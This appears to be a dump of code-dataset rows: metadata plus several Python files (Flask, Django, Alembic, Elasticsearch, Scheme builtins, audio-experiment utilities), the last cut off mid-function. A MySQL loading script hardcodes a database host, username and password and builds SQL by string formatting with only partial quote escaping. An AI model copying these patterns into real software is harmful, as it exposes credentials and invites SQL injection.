blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
โ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
157a3d3762cc8977a459d52c027c5d70f25c9791
|
e9df6cc836892f71846dca5da1b5b2bdaebf8330
|
/experimentmanager/curve_matching.py
|
3dba1df511d903f8486126a45d0c86dc6b67c126
|
[
"MIT"
] |
permissive
|
sciexpem/sciexpem
|
84866185b1a740c009365bb90fc90dfa781db59a
|
6de9a8039356588a5e817f0fa6bafd948220fc8f
|
refs/heads/master
| 2022-07-05T20:24:14.646830
| 2019-03-08T15:51:39
| 2019-03-08T15:51:39
| 174,402,006
| 0
| 2
|
MIT
| 2022-06-21T21:45:57
| 2019-03-07T18:50:35
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 5,941
|
py
|
import shutil, os, glob
import numpy as np
import subprocess
import pandas as pd
from . import models
from pint import UnitRegistry
ureg = UnitRegistry()
def normalize_execution_column(execution_column, experiment=None, target_column=None):
if execution_column.species is not None:
return execution_column.data
if experiment is None and target_column is None:
experiment = execution_column.execution.experiment
target_column = experiment.data_columns.all().get(name=execution_column.name)
elif experiment is not None and target_column is None:
target_column = experiment.data_columns.all().get(name=execution_column.name)
target_units = target_column.units
return [(float(t) * ureg.parse_expression(execution_column.units)).to(target_units).magnitude for t in
execution_column.data]
# for curve matching
def get_experiment_table(exp_id, reorder=True):
dc = models.DataColumn.objects.filter(experiment_id=exp_id)
column_names = [d.name.replace(" ", "-") if d.species is None else d.species[0] for d in dc]
column_data = [[float(dd) for dd in d.data] for d in dc]
r = pd.DataFrame(dict(zip(column_names, column_data)))
if reorder:
e = models.Experiment.objects.get(pk=exp_id)
if e.reactor == "shock tube" and e.experiment_type == "ignition delay measurement" or e.reactor == "stirred reactor":
column_names.remove("temperature")
column_names.insert(0, "temperature")
r = r[column_names]
return r
def get_models_table(exp_id, target_models=None, reorder=True, split=False):
if target_models is None:
target_models = []
executions = models.Execution.objects.filter(experiment=exp_id, chemModel__in=target_models)
data_frames = []
for execution in executions:
ec = execution.execution_columns.all()
column_names = [d.name.replace(" ", "-") if d.species is None else d.species[0] for d in ec]
column_data = [[float(dd) for dd in normalize_execution_column(d)] for d in ec]
r = pd.DataFrame(dict(zip(column_names, column_data)))
if reorder:
e = models.Experiment.objects.get(pk=exp_id)
if e.reactor == "shock tube" and e.experiment_type == "ignition delay measurement" or e.reactor == "stirred reactor":
column_names.remove("temperature")
column_names.insert(0, "temperature")
r = r[column_names]
r.columns = [i + "_" + execution.chemModel.name for i in r.columns]
data_frames.append(r)
if not split:
return pd.concat(data_frames, axis=1, sort=False)
return data_frames
class CurveMatchingExecutor():
def __init__(self, curve_matching_path, output_path):
self.curve_matching_path = curve_matching_path
self.output_path = output_path
def execute_CM(self, exp_id, target_models=None, store_results=False):
# TODO: check if already executed
dataframes = self.get_CM_dataframes(exp_id, target_models=None)
self.flush_output_folder()
self.write_CM_dataframes(dataframes)
out = self.__execute()
if out.returncode != 0:
return None
results = self.extract_CM_results()
if store_results:
self.store_results(results, exp_id)
return results
def __execute(self):
command = os.path.join(self.curve_matching_path, r"Curve Matching.exe")
out = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True,
cwd=self.curve_matching_path)
return out
def extract_CM_results(self):
path = os.path.join(self.curve_matching_path, 'Results', '*Kmatrix*.csv')
path = glob.glob(path)[0]
df = pd.read_csv(path, header=[0, 1], index_col=0)
columns = pd.DataFrame(df.columns.tolist())
columns.loc[columns[0].str.startswith('Unnamed:'), 0] = np.nan
columns[0] = columns[0].fillna(method='ffill')
df.columns = pd.MultiIndex.from_tuples(columns.to_records(index=False).tolist())
return df
# for an experiment and a set of models (default: all the available models for the experiment)
# returns a list [(e1, m1), (e2, m2), ...] of experiment/model dataframes as needed for CurveMatching
def get_CM_dataframes(self, exp_id, target_models=None):
exp_table = get_experiment_table(exp_id)
models_table = get_models_table(exp_id, target_models=target_models)
r = []
x_axis = exp_table.columns[0]
for i in range(1, len(exp_table.columns)):
column = exp_table.columns[i]
columns_exp = exp_table[[x_axis, column]]
mc = [c for c in models_table.columns if c.startswith(x_axis + "_") or c.startswith(column + "_")]
columns_mod = models_table[mc]
r.append((columns_exp, columns_mod))
return r
def flush_output_folder(self):
shutil.rmtree(self.output_path)
os.makedirs(self.output_path)
def write_CM_dataframes(self, dataframes):
for i in dataframes:
name = i[0].columns[1]
i[0].to_csv(os.path.join(self.output_path, name + "_exp.txt"), sep="\t", index=False)
i[1].to_csv(os.path.join(self.output_path, name + "_mod.txt"), sep="\t", index=False)
def store_results(self, r, exp_id):
for index, row in r.iterrows():
ecs = models.ExecutionColumn.objects.filter(execution__chemModel__name=index, execution__experiment=exp_id)
for d in ecs:
name = d.name.replace(" ", "-") if d.species is None else d.species[0]
if name in row:
index, error = row[name]['Index'], row[name]['Error']
cm = models.CurveMatchingResult(index=index, error=error, execution_column=d)
cm.save()
|
[
"gabri.scalia@gmail.com"
] |
gabri.scalia@gmail.com
|
f5560087d3c5205da216158283d187e9677206c3
|
483af21ffe6319b597728809e2431526040200b1
|
/xarm/version.py
|
2b221f4f1a2dbd26a75bba9122884849063d7edd
|
[
"BSD-3-Clause"
] |
permissive
|
vimior/xArm-Python-SDK
|
d70d8813022c0c2bac657db55299b56d9a42c396
|
0fd107977ee9e66b6841ea9108583398a01f227b
|
refs/heads/master
| 2023-01-20T00:09:58.955596
| 2022-12-06T08:34:26
| 2022-12-06T08:34:26
| 184,701,445
| 1
| 0
|
NOASSERTION
| 2019-08-13T04:19:45
| 2019-05-03T05:05:23
|
Python
|
UTF-8
|
Python
| false
| false
| 24
|
py
|
__version__ = '1.11.6'
|
[
"vinman.cub@gmail.com"
] |
vinman.cub@gmail.com
|
e0e85e71a993dc6f8e37fcc3f5c6073f51f24d73
|
3d9ae67435dc1347853b2b9af48cfd3f06d6be72
|
/Server/main_demo.py
|
4c3f8be8efcf78a03b9ae6d5157d1a2a1c4213a8
|
[] |
no_license
|
Fabianopb/mcc-thin-client
|
3e0d6f49b720d70c6d58dac8fdbc0d79cf6e898d
|
3c237fefcdda120aa072f17315b453cb4963a0d6
|
refs/heads/master
| 2021-01-11T16:59:16.821589
| 2016-10-23T16:53:30
| 2016-10-23T16:53:30
| 79,711,711
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 223
|
py
|
from flask import Flask
app = Flask(__name__)
app.config['DEBUG'] = True
@app.route('/')
def hello():
return 'Hello World!'
@app.errorhandler(404)
def page_not_found(e):
return 'Sorry, nothing at this URL.', 404
|
[
"mborekcz@lenovo.mborekcz"
] |
mborekcz@lenovo.mborekcz
|
dedf4a6c0facbe5539d15d8895fba80889bbe317
|
e037114adce145d846c6ce64aab1798dfd689ffc
|
/code/Insert_Paper_extend.py
|
2211aa6834b9aea01aca12a5b5a4085ec7598134
|
[] |
no_license
|
Jingfei-Han/citation_prediction
|
11562ef51db24861001aae8aaf2f1b31cec3f304
|
cfd1c255a894e61b179d5004febbd67b32894ad7
|
refs/heads/master
| 2021-01-19T09:58:16.406627
| 2017-07-17T02:22:49
| 2017-07-17T02:22:49
| 87,803,920
| 0
| 2
| null | 2017-05-04T06:11:11
| 2017-04-10T11:39:08
|
Python
|
UTF-8
|
Python
| false
| false
| 4,144
|
py
|
#encoding:utf-8
#่ฏฅ็จๅบ็จไบๅcitationๆฐๆฎๅบไธญๆๅ
ฅpaper่กจๅvenue่กจใdblp_dblp_id ๅๅงๅไธบ MAX_ID
import MySQLdb
import MySQLdb.cursors
import sys
import re
MAX_ID = 999999999
db = MySQLdb.connect(host='192.168.1.198', user='jingfei', passwd='hanjingfei007', db='citation', charset='utf8')
cursor = db.cursor()
f = open(r'/home/jingfei/AMiner/AMiner-Paper.txt', 'r') #From server to run.
#i = 0
sql_select = "SELECT COUNT(*) FROM venue"
try:
cursor.execute(sql_select)
cnt_aff = cursor.fetchone()[0]
cnt_aff += 1
except:
sys.exit("ERROR: SELECT the TABLE venue failed!")
dic = {
'paper_id' : 0,
'paper_title' : '0',
'paper_publicationYear' : 0,
'paper_nbCitation' : -1,
'paper_abstract' : '',
'paper_isseen' : 0,
'venue_name' : ''
}
cur_index = 1
while True:
line = f.readline()
if line:
if line == '\n': #Insert data into the table
if dic['paper_publicationYear'] < 2000: #Consider papers whose publication year greater or equal than 2000
continue
if dic['paper_title'] == dic['venue_name']: #ERROR DATA, delete it.
continue
sql_select1 = "SELECT venue_id FROM venue WHERE venue_name='%s'" %(dic['venue_name'])
try:
cursor.execute(sql_select1)
id = cursor.fetchone()[0]
except:
sql1 = "INSERT INTO venue(venue_id, venue_name, dblp_dblp_id) VALUES('%d', '%s', '%d')" % (cnt_aff, dic['venue_name'], MAX_ID)
try:
cursor.execute(sql1)
db.commit()
id = cnt_aff
cnt_aff += 1
except:
sys.exit("ERROR: INSERT INTO the TABLE venue failed!")
#ๅปๆpaper titleไธญ็ๆ ็จๅญๆฎตใ
dic['paper_title'] = dic['paper_title'].replace("Fast track article: ","").replace("Research Article: ","").replace("Guest editorial: ","").replace("Letters: ","").replace("Editorial: ","").replace("Chaos and Graphics: ","").replace("Review: ","").replace("Education: ","").replace("Computer Graphics in Spain: ","").replace("Graphics for Serious Games: ","").replace("Short Survey: ","").replace("Brief paper: ","").replace("Original Research Paper: ","").replace("Review: ","").replace("Poster abstract: ","").replace("Erratum to: ","").replace("Review: ","").replace("Guest Editorial: ","").replace("Review article: ","").replace("Editorial: ","").replace("Short Communication: ","").replace("Invited paper: ","").replace("Book review: ","").replace("Technical Section: ","").replace("Fast communication: ","").replace("Note: ","").replace("Introduction: ","")
sql2 = "INSERT INTO paper(paper_id, paper_title, paper_publicationYear, paper_nbCitation, paper_abstract, paper_isseen, venue_venue_id) \
VALUES('%d', '%s', '%d', '%d', '%s', '%s', '%d')" %(dic['paper_id'], dic['paper_title'], dic['paper_publicationYear'], dic['paper_nbCitation'], dic['paper_abstract'], dic['paper_isseen'], int(id))
try:
cursor.execute(sql2)
db.commit()
except:
if cur_index%5000 == 0:
print "Current %d record exist in the TABLE paper." %cur_index
dic = {
'paper_id' : 0,
'paper_title' : '0',
'paper_publicationYear' : 0,
'paper_nbCitation' : -1,
'paper_abstract' : '',
'paper_isseen' : 0,
'venue_name' : ''
}
if cur_index%1000 == 0:
print "The %dth paper is INSERTED successfuly!" %cur_index
cur_index += 1
continue
elif line[1] == 'i':
dic['paper_id'] = int(line.replace('#index', '').strip())
elif line[1] == '*':
dic['paper_title'] = line.replace('#*', '').strip().replace('\'', '\\\'')
elif line[1] == 't':
str = line.replace('#t', '').replace(':','').strip()
if str=='':
dic['paper_publicationYear'] = 0;
else:
convert = re.search(r'(\d+)', str).group()
dic['paper_publicationYear'] = int(convert)
elif line[1] == 'c':
dic['venue_name'] = line.replace('#c', '').strip().replace('\'', '\\\'')
if dic['venue_name'] == '':
continue
elif line[1] == '!':
dic['paper_abstract'] = line.replace('#!', '').strip().replace('\'', '\\\'')
else: #END OF FILE
print "The %d papers are INSERTED FINISHED!" %(cur_index)
break
f.close()
|
[
"749846857@qq.com"
] |
749846857@qq.com
|
8f06dbc31744ccafccf14b71eca5b27636bda6e0
|
f7b98fbe0bc11a61061d92dff94012cb41531bf4
|
/src/_builtins.py
|
de5b77f8bc5d1ec29f58e0b479b647d3d9d707a0
|
[
"Unlicense"
] |
permissive
|
algerbrex/Schemey
|
ddff8434388c57d8293ce5c35b1750f058746a02
|
4a499054758d33d2f170b0b536f1c1a7372385b7
|
refs/heads/master
| 2021-01-13T11:34:37.562476
| 2017-08-16T18:50:19
| 2017-08-16T18:50:19
| 81,210,225
| 6
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,651
|
py
|
"""
builtins.py
----------------------------------------
An implementation of builtin procedures
and variables in Scheme.
"""
import operator as op
from functools import reduce
from .expressions import *
from .utils import get_number_of_params
class ProcedureError(Exception):
pass
class Procedure:
"""
A simple representation of procedures in Scheme.
"""
def __init__(self, name, builtin_proc):
self.name = name
self.builtin_proc = builtin_proc
def __repr__(self):
return '#<Procedure {}>'.format(self.name)
def apply(self, *args):
argc = get_number_of_params(self.builtin_proc)
if argc != 'positional' and argc != len(args):
raise ProcedureError(
'Procedure "{}" expected {} argument(s).'
' Got {} instead'.format(self.name, argc, len(args))
)
return self.builtin_proc(*args)
def check_type(expected_type, objs, msg):
# sometimes `objs` is one object and not a tuple of arguments.
# deal with theses cases by wrapping single objects in a list.
objs = objs if isinstance(objs, tuple) else [objs]
if any(not isinstance(obj, expected_type) for obj in objs):
raise ProcedureError(msg)
def arith_op(op_func, unary_func):
def op(*args):
if len(args) == 1:
return Number(unary_func(args[0].value))
check_type(Number, args, "Expected numbers only")
return Number(reduce(op_func, [el.value for el in args]))
return op
def comp_op(op_func):
def op(*args):
it = iter(args)
value = next(it)
for element in it:
if op_func(value.value, element.value):
value = element
else:
return Boolean(False)
return Boolean(True)
return op
def builtin_list(*args):
pair = Nil()
for el in reversed(args):
pair = Pair(el, pair)
return pair
def builtin_cons(obj1, obj2):
return Pair(obj1, obj2)
def builtin_car(pair):
check_type(Pair, pair, "Expected pair or list.")
if pair.first is None:
raise ProcedureError("attempted car on empty list")
return pair.first
def builtin_cdr(pair):
check_type(Pair, pair, "Expected pair or list.")
if pair.first is None:
raise ProcedureError("attempted cdr on empty list")
return pair.second
def builtin_cadr(pair):
check_type(Pair, pair, "Expected pair of list")
if pair.second.first is None:
raise ProcedureError("attempted cadr on empty list")
return pair.second.first
def builtin_caddr(pair):
check_type(Pair, pair, "Expected pair of list")
if pair.second.second.first is None:
raise ProcedureError("attempted caddr on empty list")
return pair.second.second.first
def builtin_set_car(pair, obj):
check_type(Pair, pair, "Expected pair or list.")
pair.first = obj
return pair
def builtin_set_cdr(pair, obj):
check_type(Pair, pair, "Expected pair or list.")
pair.second = obj
return pair
def builtin_string_length(string):
check_type(String, string, "Expected string.")
str_len = len(string.value)
return Number(str_len)
def builtin_eqv(*args):
left, right = args[0], args[1]
if isinstance(left, Pair) and isinstance(right, Pair):
return Boolean(id(left) == id(right))
else:
return Boolean(left == right)
def builtin_and(*args):
for el in args:
if el == Boolean(False):
return el
if len(args) > 0:
return args[-1]
else:
return Boolean(True)
def builtin_or(*args):
for el in args:
if el == Boolean(True):
return el
if len(args) > 0:
return args[-1]
else:
return Boolean(False)
def builtin_not(obj):
if isinstance(obj, Boolean) and obj.value == False:
return Boolean(True)
else:
return Boolean(False)
def builtin_quotient(a, b):
return Number(a.value // b.value)
def builtin_mod(a, b):
return Number(a.value % b.value)
def builtin_is_pair(obj):
return Boolean(isinstance(obj, Pair))
def builtin_is_zero(number):
return Boolean(number.value == 0)
def builtin_is_boolean(obj):
return Boolean(isinstance(obj, Boolean))
def builtin_is_symbol(obj):
return Boolean(isinstance(obj, Symbol))
def builtin_is_number(obj):
return Boolean(isinstance(obj, Number))
def builtin_is_null(obj):
return Boolean(isinstance(obj, Nil))
def builtin_is_string(obj):
return Boolean(isinstance(obj, String))
builtin_map = {
'eq?': builtin_eqv,
'eqv?': builtin_eqv,
'pair?': builtin_is_pair,
'zero?': builtin_is_zero,
'boolean?': builtin_is_boolean,
'symbol?': builtin_is_symbol,
'number?': builtin_is_number,
'null?': builtin_is_null,
'string?': builtin_is_string,
'+': arith_op(op.add, lambda x: +x),
'-': arith_op(op.sub, lambda x: -x),
'*': arith_op(op.mul, lambda x: x),
# divison and modulation always need exactly
# two arguments. Because of this, we must implement
# them as functions instead.
'quotient': builtin_quotient,
'modulo': builtin_mod,
'=': comp_op(op.eq),
'>': comp_op(op.gt),
'<': comp_op(op.lt),
'>=': comp_op(op.ge),
'<=': comp_op(op.le),
'and': builtin_and,
'or': builtin_or,
'not': builtin_not,
'list': builtin_list,
'cons': builtin_cons,
'car': builtin_car,
'cdr': builtin_cdr,
'cadr': builtin_cadr,
'caddr': builtin_caddr,
'set-car!': builtin_set_car,
'set-cdr!': builtin_set_cdr,
'string-length': builtin_string_length,
}
|
[
"c1dea2n@gmail.com"
] |
c1dea2n@gmail.com
|
f030bde4c21b7c31c80dc828e0a67f44dc8b4914
|
e6a475fab1c62cd564abce33a7ca53929e9927e3
|
/migrations/versions/51b44cfcce3f_.py
|
77ea3ab75b365723ae591125457d07e93a40dff3
|
[] |
no_license
|
varsha0201/Fyyur
|
3b46a4c2342abca94666665e357a7c55026eb054
|
feaf200b37906241b26262521dc4f9c854fd7695
|
refs/heads/master
| 2022-12-15T21:43:29.344772
| 2019-11-24T14:09:04
| 2019-11-24T14:09:04
| 219,885,688
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,645
|
py
|
"""empty message
Revision ID: 51b44cfcce3f
Revises: ce8db3751bd8
Create Date: 2019-10-25 22:54:19.820733
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '51b44cfcce3f'
down_revision = 'ce8db3751bd8'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('Artist', sa.Column('address', sa.String(length=120), nullable=False))
op.add_column('Artist', sa.Column('seeking_description', sa.String(length=500), nullable=True))
op.add_column('Artist', sa.Column('seeking_venue', sa.Boolean(), nullable=True))
op.add_column('Artist', sa.Column('website', sa.String(length=120), nullable=False))
op.add_column('Venue', sa.Column('seeking_description', sa.String(length=500), nullable=False))
op.add_column('Venue', sa.Column('seeking_talent', sa.Boolean(), nullable=True))
op.add_column('Venue', sa.Column('website', sa.String(length=120), nullable=False))
op.drop_column('Venue', 'num_upcoming_shows')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('Venue', sa.Column('num_upcoming_shows', sa.INTEGER(), autoincrement=False, nullable=True))
op.drop_column('Venue', 'website')
op.drop_column('Venue', 'seeking_talent')
op.drop_column('Venue', 'seeking_description')
op.drop_column('Artist', 'website')
op.drop_column('Artist', 'seeking_venue')
op.drop_column('Artist', 'seeking_description')
op.drop_column('Artist', 'address')
# ### end Alembic commands ###
|
[
"Varsha0201"
] |
Varsha0201
|
ad3d8fd5bb22c17815a291bf13a1fdc52cd6bff3
|
5d309b9d1fca83d44dc869c6106e43d4268d7ba2
|
/wordcount/urls.py
|
55566e4a969e61074cbaa02cde3f7b9034f8d73d
|
[] |
no_license
|
IvanRossE/wordcount-project
|
b720d3a62dd6e870e9c17ce22207aa8af6fc606c
|
0d40e49d4bbed2e483a524ecdf44287e1db304be
|
refs/heads/master
| 2022-11-30T14:56:31.094494
| 2020-08-01T13:01:26
| 2020-08-01T13:01:26
| 284,265,514
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 867
|
py
|
"""wordcount URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from . import views
urlpatterns = [
path('',views.homepage, name='home'),
path('count/',views.count, name='count'),
path('about/',views.about, name='about')
]
|
[
"ross@Rosss-MacBook-Pro.local"
] |
ross@Rosss-MacBook-Pro.local
|
1763c5abf0cbeff022b2a7bc85b1d848cdd7adb6
|
58ac5fa83e69f2875d5305206a3a166961f31562
|
/app/search.py
|
6ebbcfba790626f5a23f12f1f1311574336f13f8
|
[] |
no_license
|
Willamette-OR/microblog-2
|
27e2d202616edca0ade2f902a945e6874118f1a9
|
f2ba8012590777b93e68707e37ebc8cf5ffea0c2
|
refs/heads/master
| 2023-07-14T16:21:02.738767
| 2021-08-26T01:42:59
| 2021-08-26T01:42:59
| 389,118,940
| 0
| 0
| null | 2021-08-12T03:08:54
| 2021-07-24T14:31:38
|
Python
|
UTF-8
|
Python
| false
| false
| 1,408
|
py
|
from flask import current_app
def add_to_index(index, model):
"""This function adds a given index along with a specified data model/table to the app's elasticsearch instance."""
# return None if elasticsearch is not configured
if not current_app.elasticsearch:
return
payload = {}
for field in model.__searchable__:
payload[field] = getattr(model, field)
current_app.elasticsearch.index(index=index, id=model.id, body=payload)
def remove_from_index(index, model):
"""This function removes a given index from the app's elasticsearch instance."""
# return None if elasticsearch is not configured
if not current_app.elasticsearch:
return
current_app.elasticsearch.delete(index=index, id=model.id)
def query_index(index, query, page, per_page):
"""This function queries a given index and a given query. It also takes a page and per_page number for pagination."""
# return None if elasticsearch is not configured
if not current_app.elasticsearch:
return [], 0
search = current_app.elasticsearch.search(index=index, body={'query': {'multi_match': {'query': query, 'fields': ['*']}},
'from': (page - 1) * per_page, 'size': per_page})
ids = [int(hit['_id']) for hit in search['hits']['hits']]
return ids, search['hits']['total']['value']
|
[
"wgrandoms@gmail.com"
] |
wgrandoms@gmail.com
|
d8e576c9c313b8facd5bacbf2652f27f5f2f9a3c
|
9b6a3902e8a33e83dd6b24dc83b8a989c6666461
|
/app/helpers/cache.py
|
0c4ead791eac0760006c432201d5849677a51ba0
|
[
"MIT"
] |
permissive
|
MTES-MCT/mobilic-api
|
91dd171c1fb22e23f4cd672d380ce27feca24366
|
1e189f1e4d175feb275585d8eba8ec08b5aa8465
|
refs/heads/master
| 2023-09-04T10:56:54.731547
| 2023-08-29T13:51:37
| 2023-08-29T13:51:37
| 238,493,241
| 1
| 0
|
MIT
| 2023-09-14T19:37:52
| 2020-02-05T16:14:13
|
Python
|
UTF-8
|
Python
| false
| false
| 1,068
|
py
|
from flask import g, has_request_context
from functools import wraps
def _get_function_hash(function_or_method):
f = function_or_method
if function_or_method.__class__ == "method":
f = function_or_method.__func__
return hash(f)
def cache_at_request_scope(f):
missing = object()
@wraps(f)
def wrapped(*args, **kwargs):
if not has_request_context():
return f(*args, **kwargs)
caches = g.get("function_caches", None)
if not caches:
g.function_caches = caches = {}
f_hash = _get_function_hash(f)
f_cache = caches.get(f_hash, None)
if not f_cache:
g.function_caches[f_hash] = f_cache = {}
cache_key = args
for item in sorted(kwargs.items(), key=lambda t: t[0]):
cache_key += item
cached_value = f_cache.get(cache_key, missing)
if cached_value is not missing:
return cached_value
value = f(*args, **kwargs)
f_cache[cache_key] = value
return value
return wrapped
|
[
"rayann.hamdan@hotmail.fr"
] |
rayann.hamdan@hotmail.fr
|
41f66d5f189dd3871733de89a22fb69901999860
|
de8b832a3c804837300b9974dc0151d9294fa573
|
/code/experiment/GenderSoundNet/ex16_1_1_1_1_1_1_1_1_1_1_1_1_1/expUtil.py
|
71ae408bd5de7553b28a9f4472613859dad14ddd
|
[] |
no_license
|
YuanGongND/Deep_Speech_Visualization
|
fcff2ac93e5adffd707b98eb7591f50fe77c1274
|
73a79e3596d9a5ee338eafb9a87b227696de25d1
|
refs/heads/master
| 2021-07-19T23:00:36.294817
| 2017-10-28T01:04:59
| 2017-10-28T01:04:59
| 105,332,686
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,429
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Oct 7 00:40:02 2017
@author: Kyle
"""
import numpy as np
import tensorflow as tf
from keras.utils import np_utils
from imblearn.under_sampling import NearMiss, AllKNN, RandomUnderSampler
from imblearn.over_sampling import ADASYN, SMOTE, RandomOverSampler
import sys
sys.path.append("../model/")
import soundNet
import waveCNN
from sklearn.preprocessing import MinMaxScaler
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score
import matplotlib.pyplot as plt
import os
import math
import seaborn as sns
#%% slice the matrix using discontinuous row index
def discontSliceRow( matrix, index ):
outputMatrix = np.zeros( [ len( index ), matrix.shape[ 1 ] ] )
outputIndex = 0
for processLine in range( 0, len( matrix ) ):
if processLine in index:
outputMatrix[ outputIndex, : ] = matrix[ processLine, : ]
outputIndex += 1
return outputMatrix
#%% slice the matrix using discontinuous column index
def discontSliceCol( matrix, index ):
outputMatrix = np.zeros( [ matrix.shape[ 0 ], len( index ) ] )
outputIndex = 0
for processCol in range( 0, matrix.shape[1] ):
if processCol in index:
outputMatrix[ :, outputIndex ] = matrix[ :, processCol ]
outputIndex += 1
return outputMatrix
#%%
def iter_loadtxt(filename, delimiter=',', skiprows=0, dtype= float):
def iter_func():
with open(filename, 'r') as infile:
for _ in range(skiprows):
next(infile)
for line in infile:
line = line.rstrip().split(delimiter)
for item in line:
yield dtype(item)
iter_loadtxt.rowlength = len(line)
data = np.fromiter(iter_func(), dtype=dtype)
data = data.reshape((-1, iter_loadtxt.rowlength))
return data
#%%
def processData( dataSet, task = 'nonEmotion', balance = 'imbalance', dataType = 'waveform' ):
if dataType == 'waveform' or dataType == 'toyWaveform':
dataSize = 96000
else:
dataSize = 256 *256
# for speaker and gender task, use all database
if task != 'emotion':
dataSet = dataSet.astype( 'float32' )
np.random.seed(seed= 7 )
np.random.shuffle( dataSet )
#np.savetxt( 'dataSetAfterShuffle.csv', dataSet, delimiter = ',' )
print( dataSet[ 17, -17 ] )
feature = dataSet[ :, 0: dataSize ]
# normalize the data
feature = ( feature - np.mean( feature ) ) /math.sqrt( np.var( feature ) )
emotionLabel = dataSet[ :, dataSize + 0 ]
speakerLabel = dataSet[ :, dataSize + 1 ]
genderLabel = dataSet[ :, dataSize + 2 ]
emotionLabel = np_utils.to_categorical( emotionLabel )
speakerLabel = np_utils.to_categorical( speakerLabel )
genderLabel = np_utils.to_categorical( genderLabel )
if task == 'speaker':
return feature, speakerLabel
elif task == 'gender':
return feature, genderLabel
# for emotion task, only select 4 classes ( 0, 1, 2, 3 ), label 4 means other emotion, should abandon
if task == 'emotion':
dataSet = dataSet.astype( 'float32' )
np.random.seed(seed= 7 )
np.random.shuffle( dataSet )
#np.savetxt( 'dataSetAfterShuffle.csv', dataSet, delimiter = ',' )
print( dataSet[ 17, -17 ] )
# select only label with 0,1,2,3
emotionLabel = dataSet[ :, dataSize ]
emotionIndices = [ i for i, x in enumerate( emotionLabel ) if x != 4]
dataSet = discontSliceRow( dataSet, emotionIndices )
feature = dataSet[ :, 0: dataSize ]
# normalize the data
feature = ( feature - np.mean( feature ) ) /math.sqrt( np.var( feature ) )
emotionLabel = dataSet[ :, dataSize ]
emotionLabel = np_utils.to_categorical( emotionLabel )
# random oversampling
if balance == 'balance':
ros = RandomOverSampler( random_state= 7 )
feature, emotionLabel = ros.fit_sample( feature, np.argmax( emotionLabel, 1 ) )
numSamples = len( emotionLabel )
emotionLabel = np.array( emotionLabel )
emotionLabel.resize( [ numSamples, 1 ] )
dataSet = np.concatenate( ( feature, emotionLabel ), axis = 1 )
np.random.shuffle( dataSet )
feature = dataSet[ :, 0: dataSize ]
emotionLabel = dataSet[ :, dataSize ]
emotionLabel = np_utils.to_categorical( emotionLabel )
assert emotionLabel.shape[ 1 ] == 4
return feature, emotionLabel
#%%
def train( testFeature, testLabel, trainFeature, trainLabel, newFolderName, iteration_num = 100, \
lr_decay = 0.1, batch_size = 32, learningRate = 0.0001, iterationNum = 100, \
modelT = soundNet.soundNet, init = 'lecun_uniform', saveSign = False, denseUnitNum = 64,\
dataType = 'waveform' ):
if dataType == 'waveform' or dataType == 'toyWaveform':
dataSize = 96000
else:
dataSize = 256 *256
os.mkdir( newFolderName + '/weight' )
os.mkdir( newFolderName + '/models' )
result = np.zeros( [ 2, iteration_num ] )
class_num = testLabel.shape[ 1 ]
train_datasize = trainFeature.shape[ 0 ]
tf.set_random_seed( 7 )
with tf.Session() as sess:
# changable learning rate
global_step = tf.Variable(0)
learning_rate = tf.train.exponential_decay( learningRate, global_step, int( iteration_num *(train_datasize/batch_size) ), lr_decay, staircase=False)
# fix random index for reproducing result
tf.set_random_seed( 17 )
input_x = tf.placeholder( tf.float32, shape = ( batch_size, dataSize ), name = 'inputx' )
input_y = tf.placeholder( tf.float32, shape = ( batch_size, class_num ), name = 'inputy' )
prediction = modelT( input_x, numClass = class_num, l2_reg = 0.5, init = init, denseUnitNum = denseUnitNum )
loss = tf.reduce_mean( tf.nn.softmax_cross_entropy_with_logits( logits = prediction, labels= input_y ) )
train_step = tf.train.AdamOptimizer( learning_rate ).minimize( loss, global_step = global_step )
#train_step = tf.train.GradientDescentOptimizer( learning_rate ).minimize( loss, global_step = global_step )
correct_prediction = tf.equal( tf.argmax( prediction, 1 ), tf.argmax( input_y, 1 ) )
accuracy = tf.reduce_mean( tf.cast( correct_prediction, tf.float32 ), name="acc_restore" )
# initialize the data
init_op = tf.global_variables_initializer( )
sess.run( init_op )
saver = tf.train.Saver( max_to_keep= 100 )
print( tf.trainable_variables() )
# number of iterations
for iteration in range( 0, iteration_num ):
# each batch
for i in range( 0, 1 *int( train_datasize / batch_size ) ):
start = ( i * batch_size ) % train_datasize
end = min( start + batch_size, train_datasize )
inputTrainFeature = trainFeature[ start: end ]
